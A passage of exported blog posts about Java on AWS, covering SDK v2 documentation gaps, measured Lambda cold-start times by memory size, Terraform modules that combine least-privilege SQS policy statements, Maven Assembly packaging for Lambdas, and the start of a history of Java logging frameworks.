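To spell that out, here's a sketch of a working invocation; the role ARN and
session name are placeholders:
<pre class="codeSample">
import software.amazon.awssdk.services.sts.StsClient;
import software.amazon.awssdk.services.sts.auth.StsAssumeRoleCredentialsProvider;
import software.amazon.awssdk.services.sts.model.AssumeRoleRequest;

StsClient stsClient = StsClient.create();

StsAssumeRoleCredentialsProvider provider =
    StsAssumeRoleCredentialsProvider.builder()
        .stsClient(stsClient)    // defined by the hidden BaseBuilder
        .refreshRequest(AssumeRoleRequest.builder()
                            .roleArn("arn:aws:iam::123456789012:role/Example")
                            .roleSessionName("example")
                            .build())
        .build();
</pre>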
<p>
I think that the core problem in both cases is that perhaps 99.9% of everything in
the SDK is generated from one central API specification. This is really the only way
that you can manage multiple SDKs for over 100 services, each of which exposes dozens
of operations. However, that 0.1% (or less) is what gives each SDK its personality,
and it seems that the documentation generators for the v2 Java SDK aren't keeping
up with the custom pieces. Fortunately, there's Google and Stack Overflow.
<dt> <b> There are still missing capabilities </b>
<dd> According to <a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/whats-different.html"
target="_blank">the migration guide</a>, “higher level” libraries like
the S3 Transfer Manager aren't available; if you need them you'll need to use
<em>both</em> the V1 and V2 SDKs. I haven't verified this myself, but in the past
I've used the Transfer Manager very heavily and have recommended it to others.
</dl>
<p> So what would be a compelling reason to switch? The only one I can think of is the
ability to use HTTP/2 and true asynchronous clients. Both can improve performance when
you're making large numbers of concurrent API calls. Of course, there are often better
alternatives to making large numbers of API calls, especially calls that run the risk
of being throttled (and a bonus complaint about AWS APIs in general: they have many
different ways to report throttling).
<p> One thing that is <em>not</em> compelling is the fear that one day AWS will decide to
discontinue the version 1 SDK. First, because AWS never seems to deprecate/remove
anything (does anyone still use SimpleDB? how about the Simple Workflow Service?).
But more important is the existing code that uses version 1. I don't know how many
millions of lines there are, but I suspect that it's large. And I also suspect that
most of it belongs to companies that pay Amazon lots of money and would seriously
reconsider cloud providers if required to update their codebases.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-52122017543322520952020-12-28T07:28:00.000-05:002020-12-28T07:28:05.629-05:00Diving Into First-Run Times for Lambdas Written in Java<p> A few weeks ago I <a href="https://stackoverflow.com/a/65160907" target="_blank">answered a Stack Overflow question</a> about the poor performance of Java Lambdas. I gave some general suggestions, but didn't provide any data to back them up. This post is my data.
<p> The question posed a situation where one Lambda invoked another, which did nothing. The asker seemed particularly concerned by the time taken by the first function: 6000+ milliseconds when cold, 300 when warm. Rather than set up an identical situation, I'm going to use a simpler example, retrieving a list of CloudWatch log groups. The execution time, as you'll see, is similar.
<p> Before getting started, I want to clarify terminology. When I use the term “cold,” I refer to a Lambda that's just been deployed. The execution time in this case consists of the time to <a href="https://docs.aws.amazon.com/lambda/latest/dg/runtimes-context.html#runtimes-lifecycle" target="_blank">initialize the Lambda runtime</a>, initialize the Java Virtual Machine (JVM), and execute the Lambda's handler function. By comparison, a “warm” invocation is able to use an existing execution environment, so only includes the time to execute the handler function.
<p> OK, on to Teh Codez:
<pre class="codeSample">
public void handler(Object ignored, Context context)
{
long start = System.currentTimeMillis();
AWSLogs client = AWSLogsClientBuilder.defaultClient();
long clientCreated = System.currentTimeMillis();
client.describeLogGroups();
long apiInvoked = System.currentTimeMillis();
System.err.format("time to create SDK client = %6d\n", (clientCreated - start));
System.err.format("time to make API call = %6d\n", (apiInvoked - clientCreated));
}
</pre>
<p> This is an extremely simple Lambda: it creates an AWS SDK client and then uses that client to invoke an API call. Before each of these actions I retrieve the current system time. How long can it take?
<h2> Setting a Baseline </h2>
<p> People like to say things are “slow.” But that term is meaningless if you don't have context. And to develop that context, you have to know both what is happening, and the physical constraints that apply. For example, on my 100 Mbit/sec Internet connection, it should take a little over 80 seconds to download a gigabyte of data. That feels like a really long time if you're waiting for the file to download, but it's not slow. If that same file takes 5 minutes to download over the same connection, it's reasonable to say that it's slow, to try to figure out why, and to attempt to correct it.
<p> If you look at the example code, you might think that it should execute instantaneously. After all, it's just two operations. If you then think about the fact that at least the second operation makes a network call, you might say that it should take 100 milliseconds or so.
<p> But observations are always better than guesses. Running on my laptop, with an Intel i7-6500U CPU at 2.5 GHz, here's how long it takes (to get these numbers I created a <code>main()</code> that just invokes the handler function):
<pre class="codeSample">
time to create SDK client = 744
time to make API call = 469
</pre>
<p> That's … much longer than one might expect. Over a second. To make sure it isn't a fluke, you should run the code several times. You should also try some other variants of the code. For example, call the handler function twice in a row:
<pre class="codeSample">
time to create SDK client = 702
time to make API call = 522
time to create SDK client = 21
time to make API call = 151
</pre>
<p> Hmmmm. The time to create the client dropped dramatically. The time to make the API call also dropped, and is closer to what I'd expect from a network service call. At this point I might also use the Linux <code>time</code> command:
<pre class="codeSample">
> time java -jar target/sandbox-lambda-java-1.0-SNAPSHOT.jar
time to create SDK client = 576
time to make API call = 623
real 0m1.320s
user 0m2.130s
sys 0m0.113s
</pre>
<p> The “real” value is also known as “wall clock” time: it's what I'm measuring by saving timestamps, and it's pretty close to the timings I print from within the program. The “user” time is the actual CPU time consumed by the program; it's nearly twice the real time, which indicates that the CPU is doing a lot of work. If the program was spending all of its time making network calls, that user time should be less than the real time.
<p> This information alone is enough to make a first pass at optimization.
<h2> Memory Allocation </h2>
<p> When you create a Java Lambda using the Console, you get a default memory allocation of 512 MB. While Java has a <a href="https://stackoverflow.com/a/561450" target="_blank">not always deserved</a> reputation for excessive memory consumption, this is more than enough to run the example program. In fact, if you look at the post-run statistics, you'll see that “Max memory used” is around 150 MB.
<p> However, maximum memory consumption only tells part of the story. A much — <em>much</em> — more important fact is that <a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-memory.html" target="_blank">Lambda provides CPU in proportion to allocated memory</a>. To get one virtual CPU, you need to allocate 1,769 MB of memory to your function. The AWS docs don't provide a table of how much CPU you'd get for a given memory size, but assuming a linear relationship, 512 MB would be a third of a CPU — a <em>virtual</em> CPU of unspecified performance.
<p> The table below compares timings for different memory allocations. These are all “cold” times: before each test I uploaded the deployment bundle, which forced Lambda to create a new execution environment. I invoked the Lambda from the Console, providing a dummy event. For consistency with the previous numbers, times are in milliseconds.
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 1024 MB </th>
<th align="right"> 2048 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Create client </td>
<td align="right"> 5298 </td>
<td align="right"> 2493 </td>
<td align="right"> 1272 </td>
<td align="right"> 1019 </td>
</tr>
<tr> <td> Invoke API call </td>
<td align="right"> 3844 </td>
<td align="right"> 2023 </td>
<td align="right"> 1061 </td>
<td align="right"> 613 </td>
</tr>
<tr> <td> Billed duration </td>
<td align="right"> 9213 </td>
<td align="right"> 4555 </td>
<td align="right"> 2349 </td>
<td align="right"> 1648 </td>
</tr>
</table>
<p> If you add up the numbers, you'll see that the billed duration is slightly larger than the sum of the two recorded times. I believe this corresponds to the time taken to start the JVM and invoke the handler function (much like running on my laptop took 1320 ms total, but only 1199 was accounted for by my timestamps).
<p> These numbers also omit the Lambda initialization time, which was approximately 500 ms. This is the time taken to start the Lambda's container, download the function code onto the container, and start the runtime environment. You aren't billed for this time, but it does affect the response time of the function, and Java Lambdas seem to take much longer than, say, Python (where initialization takes around 150 milliseconds).
<p> Based on what we know from the baseline performance test, the numbers make sense: at 4096 MB we have the equivalent of slightly more than two virtual CPUs, and the execution times are in line with what I saw running on my laptop (for what it's worth, increasing the memory size to 8192 MB, which should be 4+ vCPUs, does not significantly affect these timings). This leads to my number one rule for Lambda performance tuning:
<p align="center"> <strong> The most important thing that you can do to improve Lambda performance is increase memory allocation. </strong>
<p> This advice is, of course, subject to caveats. This example program is short, has high CPU usage relative to its runtime, and can exploit multiple virtual CPUs. A long-running Lambda that spends most of its time waiting for network calls may not benefit as much from the CPU boost.
<p> However, almost any Java Lambda will benefit from increased memory allotment as a result of garbage collection: the less memory you give it, the more often collection has to run. I added some code to track garbage collection time, and the 512 MB run consumed nearly 200 milliseconds, versus 30 for the 4096 MB run. Again, this depends on what the program is doing, but in general a larger heap means that more of the program's garbage will never make it out of the “young” generation, which can be collected more efficiently than the “tenured” generation.
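<p> I didn't show that tracking code above, but it's only a few lines using the standard JMX bean; here's a sketch of the approach:
<pre class="codeSample">
import java.lang.management.GarbageCollectorMXBean;
import java.lang.management.ManagementFactory;

public static long totalCollectionTimeMillis()
{
    // sums the accumulated collection time across all collectors; call it
    // before and after the section of interest and subtract
    long total = 0;
    for (GarbageCollectorMXBean gc : ManagementFactory.getGarbageCollectorMXBeans())
    {
        total += gc.getCollectionTime();
    }
    return total;
}
</pre>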
<h2> Classloading </h2>
<p> So what's consuming all of the CPU time for this Lambda? At least part of the answer is classloading: to run this simple program, the JVM loads 3,329 classes.
<p> The JVM loads classes on-demand. It won't load the <code>AWSLogsClientBuilder</code> class until it executes the line that calls <code>defaultClient()</code>. Loading and initializing a class require loading any classes that it depends on, and so on. Even though an individual class can be loaded very quickly, the total classloading time adds up.
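<p> You can watch this happen by running the JVM with <code>-verbose:class</code>, or you can ask it for a count; a minimal sketch:
<pre class="codeSample">
import java.lang.management.ManagementFactory;

// cumulative number of classes loaded since JVM start; compare the
// value before and after the call to defaultClient()
long loaded = ManagementFactory.getClassLoadingMXBean().getTotalLoadedClassCount();
System.err.println("classes loaded: " + loaded);
</pre>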
<p> Unfortunately, there aren't a lot of ways to avoid this cost, especially in a simple program like the example. The <a href="https://blog.gilliard.lol/2017/10/02/JVM-startup.html" target="_blank">tricks available to stand-alone Java programs</a> aren't available in Lambda.
<p> However, for real-world applications you can make architectural choices that minimize the number of classes that need to be loaded. One of the simplest is to avoid large frameworks such as Spring.
<h2> A Different SDK </h2>
<p> Another possibility might be to replace the standard AWS SDK with something that loads fewer classes. In November 2018 AWS released version 2 of its Java SDK, which is described as a “major rewrite of the version 1.x code base.” You'll occasionally see recommendations to use it for improved performance (including in the <a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/whats-new.html" target="_blank">SDK docs themselves</a>, via a link that doesn't go anywhere).
<p> But, as I said before, there's no substitution for observation. Here are the numbers using version 2.15.53:
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 1024 MB </th>
<th align="right"> 2048 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Create client </td>
<td align="right"> 4965 </td>
<td align="right"> 2278 </td>
<td align="right"> 1141 </td>
<td align="right"> 959 </td>
</tr>
<tr> <td> Invoke API call </td>
<td align="right"> 4235 </td>
<td align="right"> 2062 </td>
<td align="right"> 1047 </td>
<td align="right"> 661 </td>
</tr>
<tr> <td> Billed duration </td>
<td align="right"> 9237 </td>
<td align="right"> 4357 </td>
<td align="right"> 2204 </td>
<td align="right"> 1637 </td>
</tr>
</table>
<p> No meaningful change. To be fair, I just used the default configuration. The v2 SDK lets you change out the underlying HTTP implementation, so maybe a different one would give better numbers. But that seems like a lot of work for “maybe.”
<p> For that matter, switching to the v2 SDK requires a significant amount of tedious recoding to change package and method names. And as of this writing, there are still some features that aren't supported by v2. So I don't recommend making that switch until and unless there's a compelling reason.
<h2> Packaging </h2>
<p> Earlier this year <a href="https://blog.kdgregory.com/2020/07/packaging-java-for-aws-lambda.html" target="_blank">I wrote an article about the different ways to package a Java Lambda</a>. In that article I explored why the Lambda documentation recommended against using an “UberJar” produced by the Maven Shade plugin — even though that same documentation uses that plugin for examples. However, I didn't record the performance gained by switching to the Assembly plugin.
<p> Here's that comparison. I've taken the billed duration from the previous table, and compared it to the billed duration when packaged via the assembly plugin. Rather than show all of the memory sizes, I just show the two extremes:
<table>
<tr> <td> </td>
<th align="right"> 512 MB </th>
<th align="right"> 4096 MB </th>
</tr>
<tr> <td> Shade Plugin </td>
<td align="right"> 9213 </td>
<td align="right"> 1648 </td>
</tr>
<tr> <td> Assembly Plugin </td>
<td align="right"> 8138 </td>
<td align="right"> 1358 </td>
</tr>
</table>
<p> So, a decent speedup with a small memory allocation (which I hope you wouldn't use after reading this post!), and a minor speedup when you have plenty of memory (and CPU). Still, any speedup is a good speedup, and this requires little effort.
<h2> Provisioned Concurrency </h2>
<p> On Stack Overflow, the typical answer to people who are concerned about first-run execution time is “use Provisioned Concurrency.” I suspect that the people who say this have never actually used provisioned concurrency, because it's not a silver bullet. In fact, if you enable provisioned concurrency for my example program, <em>you'll see no change in first-run execution time.</em>
<p> The reason is that my example does everything inside its handler function, and so incurs all of the cost of classloading and initialization when that function executes. Provisioned concurrency won't help with that.
<p> To make Provisioned Concurrency help with Java first-start times, you need to move all of the code that triggers classloading and initialization into a constructor (or a static initializer, but trust me, <a href="https://blog.kdgregory.com/2012/03/static-variables-considered-harmful.html" target="_blank">don't go there</a>). This adds to the complexity of your Lambda, because you have to ensure that you fully load the SDK (and other) classes that you need to run, without actually changing anything (you don't want to write bogus data to your production DynamoDB table!).
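<p> Applied to the example from the top of this post, that restructuring looks something like this (a sketch; the class name is mine):
<pre class="codeSample">
public class Handler
{
    private final AWSLogs client;

    public Handler()
    {
        // Lambda runs this during initialization, which Provisioned
        // Concurrency performs ahead of the first request; it triggers
        // classloading and SDK setup without changing any data
        client = AWSLogsClientBuilder.defaultClient();
        client.describeLogGroups();
    }

    public void handler(Object ignored, Context context)
    {
        // by now the expensive first-run work has already happened
        client.describeLogGroups();
    }
}
</pre>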
<p> Assuming that you've gotten everything working, you'll still have the “N + 1” problem: unless you dramatically over-provision, you'll still get the occasional cold start. Perhaps it happens first thing in the morning, when all of your users connect for the first time. Or perhaps it happens when your site gets mentioned on Hacker News. Sooner or later, it will happen.
<p> Finally, there's the matter of cost: with Provisioned Concurrency, you are paying for an always-on machine. In my example, with 4 GB allocated to the Lambda, enabling Provisioned Concurrency would cost approximately $45/month <em>in addition to the per-request cost</em>. It's hard to find an exact equivalent in the EC2 world, but a t3.medium has the same memory and virtual CPU count, and costs a little over $30 per month (both prices are for us-east-2). So if you're planning to replace your “traditional” Java web-app with Lambdas to save costs, you'll get the opposite.
<h2> Wrapping Up </h2>
<p> <a href="https://github.com/kdgregory/example-lambda-java/tree/86b59c2caacbf7ebf333f70e6e8e02d398066d51" target="_blank">I first implemented a Lambda web-app with Java</a> nearly four years ago, and my opinion hasn't changed since then: if you need fast response times, then Java should not be your language of choice. Use Python, or NodeJS, or Go. Or if you must use Java, but want the benefits of Serverless computing, deploy it on ECS Fargate as a traditional J2EE application with embedded Jetty server.
<p> That doesn't mean that Java is always a bad choice for Lambdas. If you have a long-running task, such as processing large files, then startup time pales in comparison to overall runtime. And Java is an especially good choice for CPU-intensive tasks, because the Hotspot engine will optimize performance.
<p> The bottom line is that writing your Lambda functions in Java, like everything else in software engineering, is a tradeoff. Pick your application architecture based on your actual needs, not philosophical stances.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-87101982982223856522020-11-09T07:59:00.004-05:002020-11-11T06:57:12.621-05:00Building Modular Inline Policies with Terraform<p> Modules are the primary mechanism for reusability in Terraform. They're especially useful in cases where you need to stamp out a bunch of related resources multiple times. <a href="https://gist.github.com/kdgregory/bedda496da1e6b99984ef6c5d58946b4" target="_blank">For example</a>, an SQS queue along with its dead-letter queue and “least privilege” access policies.
<p> The problem with creating a separate managed policy for each module invocation is that role/policy attachments are a limited resource: by default, you're limited to <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html#reference_iam-quotas-entities" target="_blank">ten</a>. You can increase that by opening a support ticket, but the limit is still low (20 unless you can show special circumstances), and it has to be done in every account where you'll create the role.
<p> Alternatively, you can construct a combined policy in the invoking module as long as the child module outputs the queue ARNs. However, this eliminates much of the benefit of reusability, as you have to explicitly build the combined policy everywhere that you use the queue module. It also means that the person writing the combined policy has to understand the IAM permissions that are appropriate to a queue consumer or producer. At that point, why not just explicitly create your resources?
<p> In this post, I look at a different alternative: the queue module exports the JSON for the producer and consumer <em>statements</em>. The invoking module then combines the statements for each of its queues into a single application policy.
<h1> Wait, doesn't Terraform allow you to combine policies? </h1>
<p> Not in the way that I want.
<p> The <a href="https://registry.terraform.io/providers/hashicorp/aws/latest/docs/data-sources/iam_policy_document" target="_blank">iam_policy_document</a>
data source allows you to “layer” policies using its <code>source_json</code>
and <code>override_json</code> arguments, but these only accept a single document. Which
means that you can build a complex policy document step by step, but not as a
single data source. In a real-world configuration, I think that would quickly turn
into an unmaintainable mess.
<p> The <a href="https://learn.hashicorp.com/tutorials/terraform/aws-iam-policy" target="_blank">policy documents guide</a>
doesn't give any other alternatives: it recommends the data source or a
multi-line “heredoc”. Surprisingly, it doesn't mention using
<code>jsonencode()</code> at all.
<h1> Creating an SQS queue module </h1>
<p> A modern web-application is a complex beast: it often consists of a (relatively) simple API server, with background processes to handle long-running tasks such as sending notifications, rendering images, or generating reports. And linking these together, at least on AWS, are SQS queues.
<p> An SQS queue, although it seems simple, actually has a lot of hidden complexity:
<ul>
<li> Each queue should have a companion dead-letter queue, along with a "redrive policy" that determines how many times a consumer can fail to process a message before it goes to the dead-letter queue.
<li> A visibility timeout, which controls how long a consumer has to process a message before it's retried.
<li> A retention period, which controls how long a message can stay in the queue without being picked up (used to prevent queues from growing without bound when there are no or too few consumers).
<li> You should also have “least-privilege” policies for the queue's producers and consumers.
</ul>
<p> This is a perfect use for Terraform modules: rather than repeat all of the resource definitions (as you have to do with CloudFormation), you simply create a module and reference it from your main configuration:
<pre class="codeSample">
module "notifications_queue" {
source = "./modules/sqs"
queue_name = "Notifications"
}
module "reports_queue" {
source = "./modules/sqs"
queue_name = "ReportGeneration"
visibility_timeout = 600
  retry_count = 1
}
</pre>
<p> At the core of this module are the following two resource definitions, for the primary queue and its companion dead-letter queue (every primary should have a DLQ; trust me, you'll want it sooner or later):
<pre class="codeSample">
resource "aws_sqs_queue" "base_queue" {
name = var.queue_name
message_retention_seconds = var.retention_period
visibility_timeout_seconds = var.visibility_timeout
redrive_policy = jsonencode({
"deadLetterTargetArn" = aws_sqs_queue.deadletter_queue.arn,
"maxReceiveCount" = var.retry_count
})
}
resource "aws_sqs_queue" "deadletter_queue" {
name = "${var.queue_name}-DLQ"
message_retention_seconds = var.retention_period
visibility_timeout_seconds = var.visibility_timeout
}
</pre>
<p> As you can see, all configuration is via module variables. Rather than show the entire <code>variables.tf</code> file, I'll use just two to give you a sense of my philosophy. The first, of course, is <code>queue_name</code>: this is the name of the queue, and can't be defaulted. The second, <code>retention_period</code>, is something that most consumers don't care about, but some <em>might</em>. So I picked a valid default (in my experience most messages have no value after 24 hours), and the invoking module can override if needed.
<pre class="codeSample">
variable "queue_name" {
description = "The name of the queue. Used as a prefix for related resource names."
type = string
}
variable "retention_period" {
description = "Time (in seconds) that messages will remain in queue before being purged"
type = number
default = 86400
}
</pre>
<p> So far, nothing unusual. But what I'm not showing (yet) are the policy documents that let your applications read and write the queue.
<p> If you were just building a proof-of-concept, you might consider using the pre-existing <code>AmazonSQSFullAccess</code> managed policy. However, that policy grants <em>all</em> operations on <em>all</em> queues. Not just read and write, but the ability to create and delete them as well. For a real-world application, you want a “least privilege” policy that only allows actions on the queue that you've just created. And really, you want separate policies for the programs that write to the queue and those that read from the queue. To support this, my module also creates two managed policies; here's the producer policy:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
  name = "SQS-${var.queue_name}-${data.aws_region.current.name}-producer_policy"
description = "Attach this policy to producers for ${var.queue_name} SQS queue"
policy = data.aws_iam_policy_document.producer_policy.json
}
data "aws_iam_policy_document" "producer_policy" {
statement {
actions = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
]
resources = [
aws_sqs_queue.base_queue.arn
]
}
}
</pre>
<p> Simple, but as I said above, there's a limit on the number of policies that you can attach to a single role. In a real-world micro-service application, you might have a half-dozen queues. Or more.
<h1> Extracting the Policy Statement </h1>
<p> I originally created this example for a <a href="https://www.kdgregory.com/misc/presentations/2020-06-18-gpawsug-infrastructure_tools.pdf" target="_blank">user group talk</a>, so while it was based on real-world experience it wasn't actually used in the real world. I recently had to implement an SQS module for the real world, and decided to tackle the “too many policies” problem (ironically, I don't think it will be a problem for that specific use case).
<p> After reviewing the various documents linked above, I realized that none of them mentioned the <a href="https://www.terraform.io/docs/configuration/functions/jsonencode.html" target="_blank">jsonencode</a> function. This seemed like a rather strange omission, especially given the inclusion of approaches based on string literals (although not nearly as bad as XML, JSON still has its share of gotchas for those who wish to write it using strings).
<p> As it turns out, creating policy documents with <code>jsonencode()</code> instead of using a data source works quite well:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
name = "SQS-${var.queue_name}-${data.aws_region.current.name}-producer"
description = "Attach this policy to producers for ${var.queue_name}"
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [{
"Effect" = "Allow",
"Action" = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
],
"Resource" = [
aws_sqs_queue.base_queue.arn
]
}]
})
}
</pre>
<p> That was a start, but it wasn't really where I wanted to go. The next step was to move the JSON into a local:
<pre class="codeSample">
locals {
producer_policy_statement = {
"Effect" = "Allow",
"Action" = [
"sqs:GetQueueAttributes",
"sqs:GetQueueUrl",
"sqs:SendMessage",
"sqs:SendMessageBatch"
],
"Resource" = [
aws_sqs_queue.base_queue.arn
]
}
}
</pre>
<p> Now I could make the policy reference the local, rather than either inline JSON or a datasource:
<pre class="codeSample">
resource "aws_iam_policy" "producer_policy" {
name = "SQS-${var.queue_name}-${data.aws_region.current.name}-producer"
description = "Attach this policy to producers for ${var.queue_name}"
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [local.producer_policy_statement]
})
}
</pre>
<h1> Constructing an application role </h1>
<p> That's all well and good, but how does it provide any benefit over the former self-contained module? The answer is that you can reference the JSON in <code>outputs.tf</code>:
<pre class="codeSample">
output "producer_policy_statement" {
value = local.producer_policy_statement
}
</pre>
<p> And that enables the following change in the invoking module: rather than a bunch of role/policy attachments, the application role combines these snippets of JSON into an inline policy.
<pre class="codeSample">
resource "aws_iam_role" "application_role" {
name = "ApplicationRole"
assume_role_policy = # you saw this above, no need to repeat
}
resource "aws_iam_role_policy" "application_role_queue_policy" {
name = "application_role_queue_policy"
role = aws_iam_role.application_role.id
policy = jsonencode({
"Version" = "2012-10-17",
"Statement" = [
module.notifications_queue.producer_policy_statement,
module.rendering_queue.producer_policy_statement,
module.reports_queue.producer_policy_statement
]
})
}
</pre>
<p> Now, rather than counting against your quota of policy attachments, these statements count against your quota for inline policy size. Which, for role policies, is 10,240 characters. If that's too low, you can create managed policies composed of individual statements, for a total of nearly 70k per role (10 policies at 6k each, and one inline policy). If your application needs a role that's more complex than that, you might want to think about breaking it into micro-services.
<p> But in my opinion, the best feature of this implementation is that it keeps the module as the arbiter of its resource's permissions. Which means there's less of a risk that a poorly crafted policy will open your system to an attacker.
<p> If you'd like to try this out, I've saved both the <a href="https://gist.github.com/kdgregory/bedda496da1e6b99984ef6c5d58946b4" target="_blank">original</a> and the <a href="https://gist.github.com/kdgregory/54ca643f3ab6021679cfddb1d9401062" target="_blank">modular</a> versions as GitHub Gists. One thing to note: Gists don't have any conception of sub-directories, and don't allow slashes in filenames, so I've used dashes to indicate directory boundaries (this should be clear once you look at the files).
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-27786173857734669562020-07-04T08:33:00.001-04:002020-07-04T08:33:34.087-04:00Packaging Java for AWS Lambda<p> When I want to package a Java application in a single JAR with all of its dependencies,
I normally turn to Maven’s <a href="http://maven.apache.org/plugins/maven-shade-plugin/"
target="_blank">Shade</a> plugin. This plugin builds an “UberJAR” by unpacking all of
the files from the project's dependencies and repackaging them into a single JAR.
<p> The Shade plugin is also used by the <a href="https://docs.aws.amazon.com/lambda/latest/dg/java-package.html"
target="_blank">Lambda Developer's Guide</a>. I was surprised, then to see
this later in <a href="https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html"
target="_blank">the same guide</a>:
<blockquote>
<b>Reduce the time it takes Lambda to unpack deployment packages</b> authored in Java by putting
your dependency .jar files in a separate /lib directory. This is faster than putting all
your function’s code in a single jar with a large number of .class files.
</blockquote>
<p> I was surprised because a single JAR containing class files <em>should</em> be the most
efficient way to deploy a project. The JVM <a href="https://www.kdgregory.com/index.php?page=java.byteBuffer#mapped_files"
target="_blank">memory-maps</a> the JAR files on its classpath, which means that it can
access arbitrary parts of those files without an explicit call to the OS kernel. And
an UberJAR means that the JVM only has to examine a single directory structure.
<p> After some investigation, I discovered the reason: Lambda unpacks the contents of the
deployment package into its filesystem. Which means that an UberJAR turns into a lot
of little files, each of which must be read using several kernel calls.
<p> OK, so if you’re a Maven user, how do you package your Lambdas in the preferred way? The
answer is that instead of using the Shade plugin, you use the <a href="http://maven.apache.org/plugins/maven-assembly-plugin/"
target="_blank">Assembly</a> plugin. The stated goal of this plugin is to allow developers
to package their project artifact with related information such as a website. But it's a
very flexible plugin, using a “deployment descriptor” to specify which files
should be included in the final artifact, and where they should go.
<p> This is the descriptor that I used for my <a href="https://github.com/kdgregory/example-lambda-java"
target="_blank">Java Lambda example</a>. It's duplicated for each of the Lambdas, and is
found at <code>src/assembly/deployment.xml</code>:
<pre class="codeSample">
<assembly xmlns="http://maven.apache.org/ASSEMBLY/2.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/ASSEMBLY/2.0.0 http://maven.apache.org/xsd/assembly-2.0.0.xsd">
<id>deployment</id>
<includeBaseDirectory>false</includeBaseDirectory>
<formats>
<format>zip</format>
</formats>
<dependencySets>
<dependencySet>
<outputDirectory>/lib</outputDirectory>
<useProjectArtifact>true</useProjectArtifact>
<unpack>false</unpack>
<scope>runtime</scope>
</dependencySet>
</dependencySets>
</assembly>
</pre>
<p> The descriptor is simple: it says that every JAR used by the Lambda — including
the one built by the project itself — should be stored in the <code>/lib</code>
directory of the final artifact. To use it, I replace the Shade configuration in my POM
with this (the <code>plugin.assembly.version</code> property is defined as <code>3.2.0</code>):
<pre class="codeSample">
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-assembly-plugin</artifactId>
<version>${plugin.assembly.version}</version>
<configuration>
<descriptors>
<descriptor>src/assembly/deployment.xml</descriptor>
</descriptors>
</configuration>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>single</goal>
</goals>
</execution>
</executions>
</plugin>
</pre>
<p> And that's it: when I run <code>mvn package</code> I get a file in my <code>target</code>
directory with the suffix <code>-deployment.zip</code>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-33516524658398425362020-06-21T08:18:00.003-04:002020-09-13T08:12:45.437-04:00A History of Java Logging Frameworks, or, Why Commons-Logging is Still So Common<p> In the beginning there was <code>System.out.println()</code>. Or, for those of us who were purists (or wanted our output immediately), <code>System.err.println()</code>. And every developer had his or her own preferences for how their log messages would appear, leading to some very messy output as the number of developers on a team increased.
<p> To bring order to this chaos, many projects implemented their own logging framework. I worked on one such project in the late 90s: the framework consisted of a single class that implemented a static <code>log()</code> method. I can't remember what the logging output looked like, but I suspect that it included a consistently-formatted timestamp.
<p> According to <a href="https://www.javaworld.com/article/2076243/log4j-delivers-control-over-logging.html" target="_blank">this article by Ceki Gülcü</a>, a project that he was working on in 1996 also implemented their own logging framework. But unlike the project I worked on, its framework was released to the public in 1999 as Log4J.
<p> Something else that became public in 1999 was the <a href="http://mail-archives.apache.org/mod_mbox/jakarta-announcements/199910.mbox/%3C025301bf1824%24dd9e6da0%24a447fea9%40paris%3E" target="_blank">Jakarta project</a>, a collaboration between Sun and the Apache Software Foundation to produce the Tomcat application server. And of course Tomcat, being a large application with contributions by many people, had its own logging framework (and it <a href="https://tomcat.apache.org/tomcat-9.0-doc/logging.html" target="_blank"> still does</a>, although the implementation and purpose has changed over time).
<p> And lastly, 1999 was also the year that <a href="https://jcp.org/en/jsr/detail?id=47" target="_blank">JSR 047</a>, the Java Logging API Specification, was released. It turned into the <code>java.util.logging</code> (JUL) package, released as part of JDK 1.4 in 2002.
<p> A plethora of logging frameworks isn't a problem if you're an application developer: you pick one and stick with it. If you're developing a library that might be used by those applications, however, it's a nightmare. If your library uses Log4J and the application uses JUL, then the output becomes a mess and the developers using your library complain.
<p> At the time, the Jakarta project was arguably the largest single producer of libraries for Java application developers, so they added another: <a href="https://commons.apache.org/proper/commons-logging/" target="_blank">Jakarta Commons Logging</a> (since renamed to Apache Commons Logging, but you'll still see the initials "JCL" in the documentation). The idea of Commons Logging was that you would write your code against the JCL API, add the JCL JAR to your dependencies, and it would figure out what actual logging framework you were using.
<p> Although Commons Logging was intended for libraries, application developers adopted it as well. I can't speak for anyone else, but I looked at it as “won't hurt, and means I don't need to keep track of multiple APIs.” Unfortunately, some developers discovered that it <em>could</em> hurt: they were using Tomcat, regularly redeploying their applications, and had memory leaks that would eventually cause Tomcat to stop working.
